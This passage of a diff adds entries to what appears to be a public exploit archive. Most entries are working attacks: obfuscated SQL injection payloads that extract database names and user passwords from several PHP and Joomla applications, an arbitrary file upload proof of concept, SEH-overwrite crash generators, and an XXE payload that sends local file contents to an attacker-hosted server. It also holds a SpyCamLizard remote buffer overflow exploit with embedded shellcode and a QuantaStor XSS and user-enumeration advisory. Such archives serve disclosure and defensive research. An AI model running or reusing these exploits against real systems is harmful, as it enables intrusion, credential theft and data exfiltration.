+# Demo: http://www.raindropsinfotech.com/example/twitch.tv
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_twitchtv&view=twitch&username=[SQL]
+# gobgg'++aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((sELECT(sELECT+/*!22223CONCAT*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+aNd+''='
+# 
+# http://localhost/[PATH]/index.php?option=com_twitchtv&view=gamecenter&id=[SQL]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42494.txt

@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Joomla! Component KissGallery 1.0.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: http://terrywcarter.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/kissgallery/
+# Demo: http://demo.terrywcarter.com/kissgallery
+# Version: 1.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/kissgallery/1[SQL]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42496.txt

@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Matrimony Script 2.7 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://www.matrimony-script.com/
+# Software Link: http://www.matrimony-script.com/php-matrimony-software.html
+# Demo: http://www.matrimonysearch.com/
+# Version: 2.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/wedding.php?category=[SQL]&city=[SQL]
+# 
+# http://localhost/[PATH]/homeads.php?id=[SQL]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42497.txt

@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: eCardMAX 10.5 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : https://www.ecardmax.com/
+# Software Link: https://www.ecardmax.com/home/ecardmax/
+# Demo: https://ecardmax.com/ecardmaxdemo/
+# Version: 10.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# view-source:http://localhost/[PATH]/cards/sendcard/[SQL]
+# 727+union+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x64656465--+-/0x496873616e53656e63616e
+# 
+# http://localhost/[PATH]/category/[SQL]
+# 11'+aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((/*!22223sELECT*/(/*!22223sELECT*/+/*!22223CONCAT*/(cAST(dATABASE()+aS+/*!22223cHAR*/),0x7e,0x496873616E53656e63616e))+/*!22223fROM*/+iNFORMATION_sCHEMA.tABLES+/*!22223wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!22223rAND*/(0)*2))x+/*!22223fROM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!22223aNd*/+''='/0x496873616e53656e63616e
+# 
+# http://localhost/[PATH]/invitation/[SQL]
+# 15'+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''='/0x496873616e53656e63616e
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42499.txt

@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: SOA School Management 3.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : https://ynetinteractive.com/
+# Software Link: http://codecanyon.net/item/soa-school-management-software-with-integrated-parents-students-portal/20435367?s_rank=3
+# Demo: http://demo.ynetinteractive.com/soa/
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# http://localhost/[PATH]/drivers/jquery/usersession_exam.php?id=[SQL]
+# http://localhost/[PATH]/drivers/jquery/session_exam.php?id=[SQL]
+# 1'+/*!44444union*/+/*!44444select*/+1,2,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),4,5--+-
+# 1'+/*!44444union*/+/*!44444select*/+1,2,concat(username,0x3a,password),4,5+from+users--+-
+# 
+# http://localhost/[PATH]/Assignment.php?student_id=[SQL]
+# 7'and+(select+0x31+from (select+count(*),concat((select(select concat(cast(database() as char),0x7e))+from information_schema.tables+where table_schema=database()+limit 0,1),floor(rand(0)*2))x from+information_schema.tables+group+by+x)a)+AND ''='
+# 
+# http://localhost/[PATH]/Fee.php?pay&student_id=7&fee_id=[SQL]
+# 
+# http://localhost/[PATH]/YearBook.php?session_id=[SQL]
+# 
+# http://localhost/[PATH]/Transaction.php?invoice=[SQL]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42500.txt

@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: https://zcontent.net/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/zap-calendar-lite/
+# Demo: http://demo.zapcalendar.com/
+# Version: 4.3.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_zcalendar&view=plugin&name=rsvp&task=rsvpform&user=&eid=[SQL]
+# 1++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)&format=raw
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42501.txt

@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Joomla! Component Calendar Planner 1.0.1 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: http://joomlathat.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/
+# Demo: http://demo.joomlathat.com/
+# Version: 1.0.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php/component/calendarplanner/events?searchword=&option=com_calendarplanner&view=events&category_id=[SQL]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42502.txt

@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Joomla! Component SP Movie Database 1.3 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: http://joomshaper.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/sp-movie-database/
+# Demo: http://demo.joomshaper.com/2016/moview/
+# Version: 1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_spmoviedb&view=searchresults&searchword=[SQL]&type=movies&Itemid=523
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42504.txt

@@ -0,0 +1,39 @@
+# # # # #
+# Exploit Title: DeWorkshop 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : https://sarutech.com/
+# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737
+# Demo: https://demo.sarutech.com/deworkshop/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands and upload arbitrary file....
+#
+# Vulnerable Source:
+# .....................
+# $eid = $_GET["id"];
+# ......
+# $folder = "img/users/";
+# $extention = strrchr($_FILES['bgimg']['name'], ".");
+# $bgimg = $_FILES['bgimg']['name'];
+# //$bgimg = $new_name.'.jpg';
+# $uploaddir = $folder . $bgimg;
+# move_uploaded_file($_FILES['bgimg']['tmp_name'], $uploaddir);
+# .....................
+# 	
+# Proof of Concept:
+# 
+# Customer profile picture arbitrary file can be uploaded ..
+# 
+# http://localhost/[PATH]/customerupdate.php?id=1
+# http://localhost/[PATH]/img/users/[FILE].php
+# 
+#####

platforms/windows/dos/42483.py

@@ -0,0 +1,28 @@
+#!/usr/bin/python
+# Exploit Title     : MyDoomScanner1.00 Hostname/IP Field SEH Overwrite POC
+# Discovery by      : Anurag Srivastava
+# Email             : anurag.srivastava@pyramidcyber.com
+# Discovery Date    : 17/08/2017
+# Software Link     : https://www.mcafee.com/in/downloads/free-tools/mydoomscanner.aspx
+# Tested Version    : 1.00
+# Vulnerability Type: SEH Overwrite POC
+# Tested on OS      : Windows XP 
+# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
+##########################################################################################
+#  -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+ 
+#SEH chain of main thread
+#Address    SE handler
+#0012FAF8   43434343
+#42424242   *** CORRUPT ENTRY ***
+ 
+# Offset to the SEH Frame is 536
+buffer = "A"*520
+# Address of the Next SEH Frame
+nseh = "B"*4
+# Address to the Handler Code
+seh = "C" *4
+f = open("evil.txt", "wb")
+f.write(buffer+nseh+seh)
+f.close()

platforms/windows/dos/42486.py

@@ -0,0 +1,30 @@
+#!/usr/bin/python
+# Exploit Title     : DSScan v1.0 Hostname/IP Field SEH Overwrite POC
+# Discovery by      : Anurag Srivastava
+# Email             : anurag.srivastava@pyramidcyber.com
+# Website	    : http://pyramidcyber.com/
+# Discovery Date    : 18/08/2017
+# Software Link     : https://www.mcafee.com/in/downloads/free-tools/dsscan.aspx#
+# Tested Version    : 1.00
+# Vulnerability Type: SEH Overwrite POC
+# Tested on OS      : Windows 10 Home x64 
+# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
+##########################################################################################
+#  -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+ 
+#SEH chain of main thread
+#Address    SE handler
+#0019F900   43434343
+#42424242   *** CORRUPT ENTRY ***
+
+ 
+# Offset to the SEH Frame is 560
+buffer = "A"*560
+# Address of the Next SEH Frame
+nseh = "B"*4
+# Address to the Handler Code
+seh = "C" *4
+f = open("evil.txt", "wb")
+f.write(buffer+nseh+seh)
+f.close()

platforms/windows/dos/42495.py

@@ -0,0 +1,30 @@
+#!/usr/bin/python
+# Exploit Title     : MessengerScan v1.05 Hostname/IP Field SEH/EIP Overwrite POC
+# Discovery by      : Anurag Srivastava
+# Email             : anurag.srivastava@pyramidcyber.com
+# Discovery Date    : 18/08/2017
+# Software Link     : https://www.mcafee.com/in/downloads/free-tools/messengerscan.aspx#
+# Tested Version    : 1.05
+# Vulnerability Type: SEH Overwrite POC
+# Tested on OS      : Windows 7 Ultimate x64bit 
+# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
+##########################################################################################
+#  -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+ 
+#SEH chain of main thread
+#Address    SE handler
+#42424242   *** CORRUPT ENTRY ***
+
+ 
+# Offset to the SEH is 772
+buffer = "A"*772
+# Address to the Handler Code
+seh = "B"*4
+#Junk 
+junk = "C"*12
+# Address to the EIP
+eip = "D"*4
+f = open("evil.txt", "wb")
+f.write(buffer+seh+junk+eip)
+f.close()

platforms/windows/local/42000.txt

@@ -0,0 +1,33 @@
+[+] Exploit Title: Dive Assistant - Template Builder XXE Injection
+[+] Date: 12-05-2017
+[+] Exploit Author: Trent Gordon
+[+] Vendor Homepage: http://www.blackwave.com/
+[+] Software Link: http://www.diveassistant.com/Products/DiveAssistantDesktop/index.aspx
+[+] Version: 8.0
+[+] Tested on: Windows 7 SP1, Windows 10
+[+] CVE: CVE-2017-8918
+
+1. Vulnerability Description
+
+Dive Assistant - Desktop Edition comes with a template builder .exe to create print templates.  The templates are saved and uploaded as XML files which are vulnerable to XXE injection.  Sending a crafted payload to a user, when opened in Dive Assistant - Template Builder, will return the content of any local files to a remote attacker.
+
+2. Proof of Concept
+
+a.) python -m SimpleHTTPServer 9999 (listening on attacker's IP and hosting payload.dtd)
+
+b.) Hosted "payload.dtd"
+
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:9999?%file;'>">
+
+%all;
+
+c.) Exploited "template.xml"
+
+<?xml version="1.0"?
+<!DOCTYPE exploit [
+<!ENTITY % file SYSTEM "C:\Windows\System.ini">
+<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:9999?%file;'>">
+%dtd;]>
+<exploit>&send;</exploit>

platforms/windows/remote/42222.py

@@ -0,0 +1,97 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title:        SpyCamLizard v1.230 Remote Buffer Overflow (SafeSEH Bypass)
+# Date:                 20-06-2017
+# Exploit Author:       @abatchy17 -- www.abatchy.com
+# Vulnerable Software:  SpyCamLizard
+# Vendor Homepage:      http://www.spycamlizard.com/
+# Version:              1.230
+# Software Link:        http://spycamlizard.com/SpyCamLInstaller.exe
+# Tested On:            WinXP SP3 x86
+#
+# Credit to ScrR1pTK1dd13 for discovering the PoC (41667).
+#
+##############################################################################
+
+import socket
+import sys
+
+host = "127.0.0.1"
+port = 80
+
+nSEH = "\xeb\x10\x90\x90"
+
+# -----------------------------------------------------------------------------------------------------------------------------------------
+#  Module info :
+# -----------------------------------------------------------------------------------------------------------------------------------------
+#  Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
+# -----------------------------------------------------------------------------------------------------------------------------------------
+#  0x10000000 | 0x100d6000 | 0x000d6000 | False  | True    | False |  False   | False  | 1.0.0.1 [ZTcore.dll] (C:\Program Files\SpyCam Lizard\ZTcore.dll)
+#  0x00400000 | 0x006ea000 | 0x002ea000 | False  | False   | False |  False   | False  | 1.230 [SCLiz.exe] (C:\Program Files\SpyCam Lizard\SCLiz.exe)
+# -----------------------------------------------------------------------------------------------------------------------------------------
+# 
+# Sine 1) SCLiz.exe always has a null byte for any address, 2) partial overwrite didn't work and 3)ZTcore.dll had SafeSEH enabled, none of the addresses in these modules could be used.
+# Luckily the output of "!mona seh -all" contained this entry and seemed to always work for WinXP SP3 x86 (kinda awful being on heap but seems to work):
+# 0x01726017 : call dword ptr ss:[ebp-18] | ascii {PAGE_READWRITE} [Heap]
+# This won't work on later versions of Windows thanks to ASLR
+SEH = "\x17\x60\x72\x01"
+
+llamaleftovers = (
+    # Since we used call dword ptr ss:[ebp-18] instead of POP POP RET, we can POP 4 times to get the current location.
+    # Now EAX contains address of instruction jumped to right after executing call dword ptr ss:[ebp-18]
+    "\x58\x58\x58\x58"  
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = oldEAX + 0x100, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
+)
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python
+# Payload size: 440 bytes
+buf =  ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x59\x6c\x6a\x48\x6f\x72\x57\x70\x77\x70\x75\x50\x71"
+buf += "\x70\x4d\x59\x79\x75\x66\x51\x6b\x70\x53\x54\x4e\x6b"
+buf += "\x30\x50\x66\x50\x6c\x4b\x76\x32\x34\x4c\x4c\x4b\x31"
+buf += "\x42\x77\x64\x6e\x6b\x51\x62\x75\x78\x66\x6f\x68\x37"
+buf += "\x52\x6a\x56\x46\x76\x51\x69\x6f\x6e\x4c\x37\x4c\x75"
+buf += "\x31\x73\x4c\x54\x42\x54\x6c\x51\x30\x4a\x61\x6a\x6f"
+buf += "\x36\x6d\x36\x61\x68\x47\x69\x72\x79\x62\x50\x52\x73"
+buf += "\x67\x6c\x4b\x32\x72\x56\x70\x4e\x6b\x30\x4a\x57\x4c"
+buf += "\x6e\x6b\x52\x6c\x46\x71\x44\x38\x59\x73\x30\x48\x47"
+buf += "\x71\x58\x51\x43\x61\x4e\x6b\x52\x79\x71\x30\x45\x51"
+buf += "\x48\x53\x4e\x6b\x67\x39\x44\x58\x79\x73\x54\x7a\x50"
+buf += "\x49\x6c\x4b\x65\x64\x4c\x4b\x76\x61\x39\x46\x44\x71"
+buf += "\x69\x6f\x6c\x6c\x4f\x31\x78\x4f\x56\x6d\x76\x61\x38"
+buf += "\x47\x44\x78\x79\x70\x51\x65\x6b\x46\x57\x73\x53\x4d"
+buf += "\x68\x78\x65\x6b\x73\x4d\x56\x44\x73\x45\x5a\x44\x70"
+buf += "\x58\x6e\x6b\x61\x48\x35\x74\x66\x61\x6b\x63\x30\x66"
+buf += "\x6c\x4b\x34\x4c\x70\x4b\x4e\x6b\x46\x38\x75\x4c\x63"
+buf += "\x31\x78\x53\x4c\x4b\x35\x54\x4e\x6b\x55\x51\x6e\x30"
+buf += "\x4d\x59\x77\x34\x44\x64\x74\x64\x31\x4b\x51\x4b\x70"
+buf += "\x61\x70\x59\x71\x4a\x42\x71\x39\x6f\x4b\x50\x53\x6f"
+buf += "\x71\x4f\x62\x7a\x4e\x6b\x35\x42\x6a\x4b\x6c\x4d\x63"
+buf += "\x6d\x73\x5a\x33\x31\x6e\x6d\x6c\x45\x58\x32\x45\x50"
+buf += "\x35\x50\x55\x50\x56\x30\x42\x48\x56\x51\x4e\x6b\x62"
+buf += "\x4f\x6e\x67\x49\x6f\x6e\x35\x4d\x6b\x4a\x50\x6f\x45"
+buf += "\x69\x32\x71\x46\x45\x38\x6e\x46\x6e\x75\x4f\x4d\x6f"
+buf += "\x6d\x69\x6f\x6b\x65\x67\x4c\x57\x76\x31\x6c\x46\x6a"
+buf += "\x4b\x30\x6b\x4b\x4d\x30\x70\x75\x75\x55\x4f\x4b\x71"
+buf += "\x57\x46\x73\x51\x62\x52\x4f\x51\x7a\x55\x50\x70\x53"
+buf += "\x59\x6f\x58\x55\x50\x63\x63\x51\x30\x6c\x72\x43\x74"
+buf += "\x6e\x65\x35\x44\x38\x71\x75\x33\x30\x41\x41"
+
+junk1 = "A" * 1173
+junk2 = "B"*16
+junk3 = "C"*213
+junk4 = "D"*3000
+
+exploit = junk1 + nSEH + SEH + junk2 + llamaleftovers + junk3 + buf + junk4
+
+httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+httpsocket.connect((host,port))
+httpsocket.send("GET " + exploit + " HTTP/1.0\r\n\r\n")
+httpsocket.close()

platforms/xml/webapps/42517.txt

@@ -0,0 +1,157 @@
+1. --- Advisory details ---
+
+Title: QuantaStor Software Define Storage mmultiple vulnerabilities
+
+Advisory ID: VVVSEC-2017-6943
+
+Advisory URL: http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt
+
+Date published: 12/08/2017
+
+CVEs:
+     CVE-2017-9978 "Brute force login request using http post mechanism returns different errors",
+     CVE-2017-9979 "Rest call made for methods not implemented in the server return a response with the invalid method previously invoked."
+
+CVSS v3.0 score:
+     CVE-2017-9978 5.3 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
+     CVE-2017-9979 6.1 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
+
+2. --- Vulnerability details ---
+
+Class:
+    CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
+    CWE-203: Information Exposure Through Discrepancy
+
+Impact: Information disclosure
+
+Remotely Exploitable: Yes
+Locally Exploitable: No
+
+3. --- Vulnerability Description ---
+
+    OSNEXUS QuantaStor [1] Software Define Storage appliance was designed to ease the process of storage management.
+    From vendor's website "...QuantaStor SDS, deployed in datacenters worldwide, addresses a broad set of storage use
+    cases including server virtualization, big data, cloud computing, and high performance applications
+    through scale-out physical and virtual storage appliances..."
+
+    Three different vulnerabilities were found in the appliance. A user enumeration attack and two unauthenticated XSS.
+    These vulnerabilities could allow a remote attacker to obtain valid usernames to perform bruteforce attacks and
+    obtain sensitive information.
+
+
+4. --- Affected software versions ---
+
+              OSNEXUS QuantaStor v4 virtual appliance
+
+5. --- Technical description ---
+
+    5.1 --- User enumeration ---
+
+        QuantaStor login mechanism returns different messages if the account used to perform the login is valid or not in the system.
+        Leveraging this difference an attacker could be able to enumerate valid accounts.
+
+    5.1.1 --- Proof of Concept ---
+
+        Executing the following HTTP requests an attacker can perform a login request.
+
+        """
+
+        POST / HTTP/1.0
+        Content-Type: text/xml; charset=utf-8
+        Accept: application/soap+xml, application/dime, multipart/related, text/*
+        User-Agent: Axis/1.4
+        Host: localhost:5152
+        Cache-Control: no-cache
+        Pragma: no-cache
+        SOAPAction: ""
+        Authorization: Basic <REPLACE WITH BASE64 Encoded credentials>
+        Content-Length: 384
+
+
+        <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+        <soapenv:Body>
+        <objectGet xmlns="http://quantastor.osnexus.com/webservices/osn.xsd"><reserved xmlns="">
+        </reserved></auditLogGet></soapenv:Body></soapenv:Envelope>
+
+        """
+
+        If the user included in the request is valid, the error returned by the application will be:
+
+            <SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Server</faultcode><faultstring><fault>Authentication check failed for 'admin',
+            please verify your password was entered correctly. (10.10.0.1) [err=26]
+            </fault></faultstring><detail><detail><msg>Authentication check failed for 'admin', please verify your password was entered correctly. (10.10.0.1)
+            [err=26]</msg><loc>service/osn_security_manager.cpp:1298</loc></detail></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
+
+        But if the user doesn't exist in the system, the message will be:
+
+            <SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Server</faultcode><faultstring><fault>Authentication failed, please
+            verify your username, 'TESTUSER' is invalid. (10.10.0.1) [err=26]</fault></faultstring><detail><detail><msg>
+            Authentication failed, please verify your username, 'TESTUSER' is invalid. (10.10.0.1) [err=26]
+            </msg><loc>service/osn_security_manager.cpp:1256</loc></detail></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
+
+    5.2 --- Cross Site Scripting in "qsCall" parameter
+
+        QuantaStor API accepts parameters through the use of the "qsCall" parameter. If the method called
+        doesn't exist an error will be triggered containing the invalid method previously invoked.
+        The response sent to the user isn't sanitized.
+        An attacker can leverage this issue including arbitrary HTML or JavaScript code in the qsCall parameter.
+
+    5.2.2 --- Proof of Concept ---
+
+        Execute the following HTTP request.
+
+        """
+        https://<HOST>:8153/qstorapi?qsCall=%3Cscript%3Ealert(1)%3C/script%3E
+        """
+
+    5.3 --- Cross Site Scripting in "/qstorapi/jsonrpc"
+
+        QuantaStor "jsonrpc "API accepts parameters through the use of a JSON dictionary. If the method called
+        doesn't exist an error will be triggered containing the invalid method previously invoked.
+        The response sent to the user isn't sanitized.
+        An attacker can leverage this issue including arbitrary HTML or JavaScript code in the "method" key.
+
+    5.3.1 --- Proof of Concept ---
+
+        Execute the following HTTP request.
+
+        """
+        POST /qstorapi/jsonrpc HTTP/1.0
+
+        Accept: application/soap+xml, application/dime, multipart/related, text/*
+        User-Agent: Axis/1.4
+        Host: <HOST>:8153
+        Cache-Control: no-cache
+        Pragma: no-cache
+        Content-Type: application/json
+        Content-Length: 54
+
+
+        {"method":"<script>alert(1)</script>", "params":"asd"}
+        """
+
+
+6. --- Vendor information ---
+
+        OSNEXUS released Quantastor version 4.3.1 fixing CVE-2017-9978 and CVE-2017-9979
+
+7. --- Credits ---
+
+    These vulnerabilities were discovered by Nahuel D. Sanchez, VVVSecurity
+
+8. --- Report timeline ---
+
+    25/06/2017 -- VVVSecurity sent Advisory to OSNEXUS
+    29/06/2017 -- OSNEXUS confirmed the security vulnerabilities, CVE-2017-9978 and CVE-2017-9979 were provided.
+    24/07/2017 -- OSNEXUS released QuantaStor version 4.3.1
+    12/08/2017 -- Security Advisory published
+
+9. --- References ---
+
+    [1] https://www.osnexus.com/software-defined-storage/
+
+10. --- Copyright ---
+
+    The contents of this advisory are copyright (c) 2017 VVVSecurity and are licensed
+    under a Creative Commons Attribution Non-Commercial Share-Alike 4.0
+    License: http://creativecommons.org/licenses/by-nc-sa/4.0/ <http://creativecommons.org/licenses/by-nc-sa/4.0/>